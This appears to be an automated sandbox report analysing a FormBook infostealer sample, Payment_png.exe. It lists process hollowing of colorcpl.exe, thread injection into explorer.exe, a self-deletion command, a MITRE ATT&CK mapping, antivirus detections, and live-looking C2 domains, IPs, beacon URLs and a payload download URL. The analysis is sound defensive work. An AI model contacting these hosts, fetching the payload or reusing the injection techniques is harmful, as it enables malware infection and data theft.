Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3A44B mov eax, dword ptr fs:[00000030h]	14_2_04C3A44B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C9C450 mov eax, dword ptr fs:[00000030h]	14_2_04C9C450
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C9C450 mov eax, dword ptr fs:[00000030h]	14_2_04C9C450
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2746D mov eax, dword ptr fs:[00000030h]	14_2_04C2746D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]	14_2_04C3AC7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]	14_2_04CD740D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]	14_2_04CD740D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]	14_2_04CD740D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]	14_2_04C86C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]	14_2_04C86C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]	14_2_04C86C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]	14_2_04C86C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]	14_2_04CC1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3BC2C mov eax, dword ptr fs:[00000030h]	14_2_04C3BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]	14_2_04C86DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]	14_2_04C86DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]	14_2_04C86DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86DC9 mov ecx, dword ptr fs:[00000030h]	14_2_04C86DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]	14_2_04C86DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]	14_2_04C86DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C1D5E0 mov eax, dword ptr fs:[00000030h]	14_2_04C1D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C1D5E0 mov eax, dword ptr fs:[00000030h]	14_2_04C1D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]	14_2_04CCFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]	14_2_04CCFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]	14_2_04CCFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]	14_2_04CCFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CB8DF1 mov eax, dword ptr fs:[00000030h]	14_2_04CB8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]	14_2_04C32581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]	14_2_04C32581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]	14_2_04C32581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]	14_2_04C32581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]	14_2_04C02D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]	14_2_04C02D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]	14_2_04C02D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]	14_2_04C02D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]	14_2_04C02D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3FD9B mov eax, dword ptr fs:[00000030h]	14_2_04C3FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3FD9B mov eax, dword ptr fs:[00000030h]	14_2_04C3FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD05AC mov eax, dword ptr fs:[00000030h]	14_2_04CD05AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD05AC mov eax, dword ptr fs:[00000030h]	14_2_04CD05AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C335A1 mov eax, dword ptr fs:[00000030h]	14_2_04C335A1

Source: C:\Users\user\Desktop\Payment_png.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.loversdeal.com
Source: C:\Windows\explorer.exe	Domain query: www.uforservice.com
Source: C:\Windows\explorer.exe	Domain query: www.slutefuter.com
Source: C:\Windows\explorer.exe	Domain query: www.booksfall.com
Source: C:\Windows\explorer.exe	Network Connect: 66.96.160.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.plowbrothers.com
Source: C:\Windows\explorer.exe	Domain query: www.choupisson.com
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.domennyarendi39.net
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.birkenhof-allgaeu.net
Source: C:\Windows\explorer.exe	Domain query: www.pcpartout.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E70000

Jump to behavior

Source: C:\Users\user\Desktop\Payment_png.exe	Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'			Jump to behavior

Source: explorer.exe, 00000006.00000002.469681578.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2988, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Virtualization/Sandbox Evasion22	OS Credential Dumping	Security Software Discovery721	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection512	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Information Discovery31	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Payment_png.exe	70%	Virustotal		Browse
Payment_png.exe	22%	Metadefender		Browse
Payment_png.exe	79%	ReversingLabs	Win32.Trojan.Vebzenpak

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.2.colorcpl.exe.30327b8.2.unpack	100%	Avira	TR/Dropper.Gen		Download File
14.2.colorcpl.exe.5117960.5.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Link
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal	Browse
aps-mm.com	2%	Virustotal	Browse
silverdollarcafe.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.uforservice.com	0%	Avira URL Cloud	safe
http://www.aainakari.com	0%	Avira URL Cloud	safe
http://www.accinf5.com/c8bs/www.silverdollarcafe.com	0%	Avira URL Cloud	safe
http://www.silverdollarcafe.comReferer:	0%	Avira URL Cloud	safe
http://www.accinf5.com	0%	Avira URL Cloud	safe
http://www.domennyarendi39.net/c8bs/www.accinf5.com	0%	Avira URL Cloud	safe
http://www.loversdeal.comReferer:	0%	Avira URL Cloud	safe
http://www.slutefuter.comReferer:	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.pcpartout.comReferer:	0%	Avira URL Cloud	safe
http://www.birkenhof-allgaeu.net/c8bs/	0%	Avira URL Cloud	safe
http://www.silverdollarcafe.com	0%	Avira URL Cloud	safe
http://www.aainakari.com/c8bs/www.bostonm.info	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.plowbrothers.com	0%	Avira URL Cloud	safe
http://www.silverdollarcafe.com/c8bs/	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.choupisson.comReferer:	0%	Avira URL Cloud	safe
http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com	0%	Avira URL Cloud	safe
http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net	0%	Avira URL Cloud	safe
http://www.birkenhof-allgaeu.net	0%	Avira URL Cloud	safe
http://www.booksfall.com	0%	Avira URL Cloud	safe
http://www.quantify-co.com/c8bs/	0%	Avira URL Cloud	safe
http://www.plowbrothers.comReferer:	0%	Avira URL Cloud	safe
http://www.domentemenegi42.net	0%	Avira URL Cloud	safe
http://www.pcpartout.com/c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe
http://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe
http://www.bostonm.info/c8bs/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.aainakari.comReferer:	0%	Avira URL Cloud	safe
http://www.plowbrothers.com/c8bs/www.slutefuter.com	0%	Avira URL Cloud	safe
http://www.booksfall.com/c8bs/	0%	Avira URL Cloud	safe
http://www.domennyarendi39.net	0%	Avira URL Cloud	safe
http://aps-mm.com/bin_BNUtTDfY243.bin	0%	Avira URL Cloud	safe
http://www.aainakari.com/c8bs/	0%	Avira URL Cloud	safe
http://www.loversdeal.com/c8bs/www.booksfall.com	0%	Avira URL Cloud	safe
http://www.uforservice.com/c8bs/	0%	Avira URL Cloud	safe
http://www.uforservice.com/c8bs/www.domennyarendi39.net	0%	Avira URL Cloud	safe
http://www.plowbrothers.com/c8bs/	0%	Avira URL Cloud	safe
http://www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.pcpartout.com	0%	Avira URL Cloud	safe
http://www.choupisson.com	0%	Avira URL Cloud	safe
http://www.domentemenegi42.net/c8bs/	0%	Avira URL Cloud	safe
http://www.plowbrothers.com/c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe
http://www.broskiusa.comReferer:	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.accinf5.comReferer:	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.domennyarendi39.net/c8bs/	0%	Avira URL Cloud	safe
http://www.domennyarendi39.netReferer:	0%	Avira URL Cloud	safe
http://www.choupisson.com/c8bs/	0%	Avira URL Cloud	safe
http://www.slutefuter.com	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.choupisson.com/c8bs/www.uforservice.com	0%	Avira URL Cloud	safe
www.booksfall.com/c8bs/	0%	Avira URL Cloud	safe
http://www.bostonm.info/c8bs/www.quantify-co.com	0%	Avira URL Cloud	safe
http://www.slutefuter.com/c8bs/	0%	Avira URL Cloud	safe
http://www.booksfall.com/c8bs/www.pcpartout.com	0%	Avira URL Cloud	safe
http://www.broskiusa.com/c8bs/www.aainakari.com	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.aps-mm.com/bin_BNUtTDfY243.bin	0%	Avira URL Cloud	safe
http://www.silverdollarcafe.com/c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe
http://www.broskiusa.com/c8bs/	0%	Avira URL Cloud	safe
http://www.loversdeal.com/c8bs/	0%	Avira URL Cloud	safe
http://www.birkenhof-allgaeu.net/c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe
http://www.uforservice.com/c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
plowbrothers.com	34.102.136.180	true	false		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false	0%, Virustotal, Browse	unknown
aps-mm.com	170.249.199.106	true	false	2%, Virustotal, Browse	unknown
parkingpage.namecheap.com	198.54.117.218	true	false		high
silverdollarcafe.com	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
